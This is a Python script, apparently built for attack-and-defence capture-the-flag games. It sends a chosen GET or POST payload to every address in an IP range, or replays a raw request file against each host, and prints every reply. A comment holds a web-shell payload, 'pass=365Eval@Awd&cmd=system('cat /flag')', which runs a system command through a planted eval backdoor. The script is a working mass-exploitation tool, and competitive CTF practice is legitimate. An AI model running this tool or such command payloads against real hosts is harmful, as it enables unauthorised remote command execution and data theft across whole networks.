#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests
import sys
# 批量Get_Flag
# IP地址处理,调用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一个数组
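def IPs(ip):
    """Expand an address spec into a list of IPv4 address strings.

    Two spellings are understood:

    * CIDR, e.g. ``"192.168.10.0/24"`` -- handed to ``IPy.IP`` and every
      address it yields is collected;
    * last-octet range, e.g. ``"192.168.10.0-20"`` -- the text up to and
      including the last ``.`` is the prefix, and the integers either side of
      the last ``-`` are the inclusive bounds of the final octet.  The bounds
      are not range-checked (nothing stops ``0-300``), and a start above the
      end simply yields nothing.

    Anything else (including an empty string) returns an empty list.

    Every element is returned as ``str``.  The CIDR branch previously
    appended the raw ``IPy.IP`` objects, which broke the ``'[*]testing ' + i``
    concatenation in the callers; stringifying here keeps both branches
    consistent.
    """
    addresses = []
    if ip.find("/") > 0:
        addresses = [str(addr) for addr in IP(ip)]
    elif str(ip).find("-") > 0:
        text = str(ip)
        dot = text.rfind(".")
        dash = text.rfind("-")
        prefix = text[:dot + 1]
        first = int(text[dot + 1:dash])
        last = int(text[dash + 1:])
        addresses = [prefix + str(octet) for octet in range(first, last + 1)]
    return addresses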
# Headers attached to every request sent by get_Requests / post_Requests.
# Insertion order is kept as in the original literal; the User-Agent value
# deliberately ends with a space because that is the exact string sent before.
headers = dict([
    ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
    ("Referer", "https://www.baidu.com"),
    ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 "),
    ("Cache-Control", "no-cache"),
])
# get请求
def get_Requests(ip, payload):
    """Send one GET to ``http://<ip>/<payload>`` and return the response body.

    ``ip`` is stringified, so IPy objects work as well as plain strings;
    ``payload`` is appended verbatim (no URL encoding, no leading-slash
    handling).  The module-level ``headers`` are sent and a 3 second timeout
    applies.  Only ``requests.exceptions.ConnectTimeout`` is caught and turned
    into the literal string ``"Connect Timeout"``; every other ``requests``
    exception (refused connection, read timeout, ...) propagates to the
    caller.
    """
    target = "".join(["http://", str(ip), "/", payload])
    try:
        response = requests.get(target, headers=headers, timeout=3)
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"
    return response.text
# post请求
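def post_Requests(ip, payload, post_data):
    """Send one POST to ``http://<ip>/<payload>`` with a form body and return the response body.

    ``post_data`` is a ``key=value&key=value`` string.  Each pair is split on
    its FIRST ``=`` only, so a value that itself contains ``=`` is kept whole
    (the previous ``split('=')[1]`` truncated it); a pair without ``=`` maps
    to the empty string, and empty pairs (e.g. from a trailing ``&``) are
    skipped.  The parsed form is echoed to stdout before sending, as before.
    ``ip`` is stringified for consistency with ``get_Requests``.  The
    module-level ``headers`` and a 3 second timeout are used; only
    ``requests.exceptions.ConnectTimeout`` is caught (returned as
    ``"Connect Timeout"``), every other ``requests`` exception propagates.
    """
    target = "".join(["http://", str(ip), "/", payload])
    form = {}
    for pair in post_data.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        form[key] = value
    print(form)
    try:
        response = requests.post(target, headers=headers, data=form, timeout=3)
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"
    return response.text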
# 读取文件
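def open_file(file_name):
    """Read ``file_name`` and return its lines with the trailing newline removed.

    Only ``"\\n"`` is stripped, exactly as before, so other leading/trailing
    whitespace on a line is preserved.  The file is opened in text mode with
    the platform default encoding (unchanged) inside a ``with`` block so the
    handle is closed even if iteration fails; the original relied on the
    garbage collector to close it.  Raises ``OSError`` (e.g.
    ``FileNotFoundError``) when the file cannot be opened.
    """
    with open(file_name) as handle:
        return [line.strip("\n") for line in handle]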
# 解析get数据包
def get_Data(data):
    """Return the request-target from a raw GET request read by ``open_file``.

    ``data[0]`` is expected to be the request line (``"GET /path HTTP/1.1"``);
    its second space-separated token is returned unchanged, leading ``/``
    included.  Note that the callers then prepend ``'http://<ip>/'``, so a
    target taken from a request file produces a ``//`` in the final URL.
    Raises ``IndexError`` when ``data`` is empty or the line has fewer than
    two tokens.
    """
    tokens = data[0].split(" ")
    return tokens[1]
# pass=365Eval@Awd&cmd=system('cat /flag')
# 解析post数据包
def post_Data(data):
    """Split a raw POST request (lines from ``open_file``) into ``[target, body]``.

    ``data[0]`` must be the request line; its second token is the target.
    The LAST line of the file is taken as the form body, so the request file
    is expected to end with the ``key=value&...`` line.  Header lines in
    between are ignored.  Raises ``IndexError`` on an empty list or a request
    line with fewer than two tokens.
    """
    target = data[0].split(" ")[1]
    body = data[-1]
    return [target, body]
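def cmd():
    """Command-line entry point: parse ``--key=value`` arguments and run the batch.

    Recognised arguments: ``--type`` (get/post), ``--ip`` (any spec accepted
    by ``IPs``), ``--payload``, ``--data`` (POST form body), ``--file`` (raw
    request file parsed by ``get_Data`` / ``post_Data``).  With no arguments
    the usage text is printed and the interactive ``main()`` takes over.

    Fixes relative to the previous version:

    * each argument is split on its FIRST ``=`` only, so
      ``--data=username=sss&passwd=ddd`` keeps the whole body (it used to be
      cut down to ``username``), and an argument without ``=`` no longer
      raises ``IndexError``;
    * ``--type=post`` sends ``--data`` directly, the same way ``main()`` does;
      the old code passed the body string to ``post_Data``, which indexes its
      argument as a list of lines and failed;
    * the usage text now names the ``--payload`` flag that is actually parsed
      (it said ``--pyload``);
    * an unrecognised ``--type`` prints ``error`` instead of silently doing
      nothing.

    Missing ``--ip`` yields an empty range (nothing is probed); a missing or
    unreadable ``--file`` in file mode raises ``OSError`` from ``open_file``.
    """
    if len(sys.argv) == 1:
        print("Instructions for use")
        print("python3 Game.py --type=get --ip=192.168.10.0/24 --payload=test.php")
        print("python3 Game.py --type=post --ip=192.168.10.0/24 --payload=test.php --data=username=sss&passwd=ddd")
        print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ")
        main()
        return

    options = {"--type": "", "--payload": "", "--data": "", "--file": "", "--ip": ""}
    for arg in sys.argv[1:]:
        # Split on the first '=' only: values such as a form body contain '='.
        key, _, value = arg.partition("=")
        if key in options:
            options[key] = value

    def probe(send):
        # Walk the range once, announcing each host before printing its reply.
        for host in IPs(options["--ip"]):
            print("[*]testing " + host)
            print(send(host))

    request_type = options["--type"].upper()
    if request_type:
        if request_type == "GET":
            probe(lambda host: get_Requests(host, options["--payload"]))
        elif request_type == "POST":
            probe(lambda host: post_Requests(host, options["--payload"], options["--data"]))
        else:
            print("error")
        return

    # File mode: the request line's verb decides how the file is interpreted.
    data = open_file(options["--file"])
    verb = data[0].split(" ")[0]
    if verb == "GET":
        probe(lambda host: get_Requests(host, get_Data(data)))
    elif verb == "POST":
        target, body = post_Data(data)
        probe(lambda host: post_Requests(host, target, body))
    else:
        print("error")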
def main():
    """Interactive fallback: prompt for range, method and payload, then run the batch.

    Method codes read from the second prompt: ``2`` -> POST (asks for a form
    body as well), ``3`` -> read a raw request file and pick GET or POST from
    its request line, anything else -> GET.  ``int()`` on that prompt raises
    ``ValueError`` for non-numeric input, as before.  Prompts and the
    ``[*]testing`` progress lines are unchanged.
    """
    print('#get_Flag V2.0')
    ip_range = input('Please enter the IP range >>>')
    method = int(input('Please select request method 1 = get 2 = post 3 = auto>>>'))

    def probe(send):
        # One pass over the range; announce each host, then print the reply.
        for host in IPs(ip_range):
            print('[*]testing ' + host)
            print(send(host))

    if method == 3:
        filename = input('Please enter filename>>>')
        data = open_file(filename)
        verb = data[0].split(' ')[0]
        if verb == 'GET':
            probe(lambda host: get_Requests(host, get_Data(data)))
        elif verb == 'POST':
            probe(lambda host: post_Requests(host, post_Data(data)[0], post_Data(data)[1]))
        else:
            print('error')
        return

    payload = input('Please enter the payload>>>')
    if method == 2:
        post_data = input('Please enter post_data>>>')
        probe(lambda host: post_Requests(host, payload, post_data))
    else:
        probe(lambda host: get_Requests(host, payload))
# Script entry: the argv-driven cmd() runs first and itself falls back to the
# interactive main() when no arguments were given.
if __name__ == '__main__':
    cmd()